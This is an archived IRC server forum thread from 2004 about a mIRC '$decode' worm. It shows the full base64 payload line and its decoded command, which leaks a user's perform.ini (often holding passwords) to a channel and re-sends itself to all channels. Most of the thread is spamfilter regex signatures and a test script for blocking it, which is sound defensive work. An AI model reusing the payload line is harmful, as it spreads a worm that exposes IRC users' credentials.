mIRC $decode exploit

These are old archives. They are kept for historic purposes only.
Stealth
Head of Support
Posts: 2086
Joined: Tue Jun 15, 2004 8:50 pm
Location: Chino Hills, CA, US

mIRC $decode exploit

Post by Stealth » Mon Jun 21, 2004 3:56 am

The newest form of exploit for mIRC uses $decode.

This exploit is seen as lines that look like this:

LOL! //echo -a $($decode(JGZpbmRmaWxlKC4sKiwxLHNjaWQgLWF0MSAuYW1zZyBMT0whICQhY2IoMSkgfCAucGxheSAj/SBwZXJmb3JtLmluaSk=,m),2)
Which when echoed, does this:

//echo -a $findfile(.,*,1,scid -at1 .amsg LOL! $!cb(1) | .play <some channel> perform.ini)
This makes the person's perform.ini file visible to whoever is on the channel it is played to. Since a lot of people use perform for identifying, this makes takeovers and such extremely easy. Along with that, it messages itself to all the channels you are on, on all the servers you are connected to. All the user sees is the first file in his/her mIRC folder Windows tells it. The rest are done as "silent" commands.

Not too good with regex, but here is a try:

spamfilter {
	regex ".* //echo -a \$\(\$decode\(.*,m\),[0-9]\)";
	target channel;
	action block;
	reason "$decode exploit";
};

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Mon Jun 21, 2004 2:46 pm

While I would agree with blocking any and all forms of $decode (if you want to send a file like that, use DCC), I think this regex would be good for blocking this specific exploit:

^LOL! //echo -a \$(\$decode(.+,m),[0-9])$
(?: are the \'s necessary here? I blame .NET for making me think they are :P )

codemastr
Former UnrealIRCd head coder
Posts: 811
Joined: Sat Mar 06, 2004 8:47 pm
Location: United States

Post by codemastr » Mon Jun 21, 2004 6:16 pm

You need the \ for ( and ), but not for $. () are metacharacters for grouping. The $ doesn't need it because the $ only has meaning at the end of a (sub)expression.
-- codemastr

Stealth
Head of Support
Posts: 2086
Joined: Tue Jun 15, 2004 8:50 pm
Location: Chino Hills, CA, US

Post by Stealth » Mon Jun 21, 2004 9:40 pm

I think having .* at the beginning is a good thing though, since it can have anything there to attract attention.

This does not block all of $decode, because of the $( in front of it. The $( tells mIRC to re-evaluate the output of $decode.

I have also noticed that the echo may have either of these switches: a (active window) or s (status window).

From what everyone is saying, this regex should match it well enough:

//echo -[as] $\($decode\(.+,m\),[0-9]\)

Syzop
UnrealIRCd head coder
Posts: 1955
Joined: Sat Mar 06, 2004 8:57 pm
Location: .nl

Post by Syzop » Tue Jun 22, 2004 1:34 am

I've added the following sig to CVS:

spamfilter {
        regex "^LOL! //echo -a \$\(\$decode\(.+,m\),[0-9]\)$";
        target channel;
        reason "$decode exploit";
        action block;
};
Without escaping the $'s it didn't work here btw ;p.
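Added here as an illustration, not code from the thread or from UnrealIRCd: the three regex drafts above run against constructed sample channel lines, using Python's re module as a stand-in for the IRCd's regex engine. The sample lines and the base64 string are made up (it decodes to "ABCDEFGH"), and the helper names are my own.

```python
import base64
import re

# Constructed sample channel lines (not the real payload from the thread;
# the base64 here just decodes to "ABCDEFGH").
SAMPLES = {
    "exploit_active": "LOL! //echo -a $($decode(QUJDREVGR0g=,m),2)",
    "exploit_status": "lol //echo -s $($decode(QUJDREVGR0g=,m),2)",
    "benign_encode":  "try $encode(hello,m) in mIRC to see base64",
}

# The thread's candidate spamfilter patterns, as PCRE-style strings.
PATTERNS = {
    # aquanight's first draft: $ and ( ) left unescaped, so $ acts as an
    # end anchor and ( ) as groups; it can never match a real line.
    "unescaped": r"^LOL! //echo -a $($decode(.+,m),[0-9])$",
    # Syzop's CVS signature: escaped, anchored to the "LOL!" lure and -a.
    "cvs_sig":   r"^LOL! //echo -a \$\(\$decode\(.+,m\),[0-9]\)$",
    # Stealth's broader form (with the $ escaped): any lure text, -a or -s.
    "broad":     r"//echo -[as] \$\(\$decode\(.+,m\),[0-9]\)",
}


def matches(pattern_name, line):
    """True if the named spamfilter regex would block this line."""
    return re.search(PATTERNS[pattern_name], line) is not None


def matrix():
    """Which pattern blocks which sample: {pattern: {sample: bool}}."""
    return {p: {s: matches(p, line) for s, line in SAMPLES.items()}
            for p in PATTERNS}


def decode_payload(line):
    """Triage helper: pull the base64 out of $decode(...,m) (m = MIME)
    and decode it so an oper can read what a blocked line would run.
    Returns None when the line carries no such call."""
    m = re.search(r"\$decode\(([A-Za-z0-9+/=]+),m\)", line)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("latin-1", "replace")


if __name__ == "__main__":
    for name, row in matrix().items():
        print(name, row)
    print(decode_payload(SAMPLES["exploit_active"]))
```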

Gilou
Posts: 3
Joined: Wed Jun 30, 2004 8:45 am
Location: Pornichet, France

noobs net

Post by Gilou » Wed Jun 30, 2004 8:53 am

Hi ;)
Actually, the arrival of these bots also let us see (admin) that a lot of noobs were pasting the $decode thing, whatever it might contain, so, may it be paranoia, we decided to block $decode (with a terrible wildcarding), as it's quite useless, and if it does not damage anything, it's quite annoying running after noobs who let stupid $decode things spread ...
SHUT UP!

Terantula

I agree, $decode is useless...

Post by Terantula » Fri Jul 16, 2004 5:16 pm

... as I have never used it as a user in the years I have been chatting, so I have to agree with Gilou on this: blocking the use of $decode is not a loss, but a fix to a long-existing problem.

I put this spamfilter into my IRCd ASAP.

spamfilter {
regex ".*\$decode.*";
target channel;
action block;
reason "$decode commands are not permitted on this server.";
};

I don't know an apple from regcode, so I hope this works... :)

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Fri Jul 16, 2004 11:03 pm

just $decode by itself is enough...

and you might want to block $encode while you're at it :P

Guest

Post by Guest » Mon Jul 19, 2004 8:14 pm

Why? $encode can't be used for that type of exploit. It can create them, but it never gets said on the server...

w00t
Posts: 1136
Joined: Thu Mar 25, 2004 3:31 am
Location: Nowra, Australia

Post by w00t » Mon Jul 19, 2004 11:27 pm

Unless it's been escaped.
-ChatSpike IRC Network [http://www.chatspike.net]
-Denora Stats [http://denora.nomadirc.net]
-Omerta [http://www.barafranca.com]

Jason
Posts: 570
Joined: Mon Jun 14, 2004 5:09 pm

Post by Jason » Tue Jul 20, 2004 12:10 am

Claims Guest Post Above

But that would only be a mistake. And it isn't automatically for creating exploits, so a spamfilter GLINE etc. on it wouldn't be good (I $encode my passwords in my connect script to prevent accidental showing to the person behind me. I certainly wouldn't want to be glined for accidentally missing a / on my //echo $encode(pass)).
Why the hell can't my signature be empty?
"Your message contains too few characters."

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Wed Jul 21, 2004 12:55 am

Jason wrote: I certainly wouldn't want to be glined for accidentally missing a / on my //echo $encode(pass))
/echo doesn't even send to the server...

(Off-topic mIRC trick: hit tab after typing an identifier to evaluate it right then and there - only works on the command line (not in the script editor). :) )

Jason
Posts: 570
Joined: Mon Jun 14, 2004 5:09 pm

Post by Jason » Thu Jul 22, 2004 12:40 am

Oops, just trying to make an example! How's this:

//msg $me $encode(pass)

aquanight
Official supporter
Posts: 862
Joined: Tue Mar 09, 2004 10:47 pm
Location: Boise, ID

Post by aquanight » Thu Jul 22, 2004 4:00 am

Well, /msg NickServ $encode(pass) would be a better example, but I personally use /nickserv :P .

Jason
Posts: 570
Joined: Mon Jun 14, 2004 5:09 pm

Post by Jason » Thu Jul 22, 2004 4:05 am

$decode you mean; when actually sending it, you would want to decode, not encode.
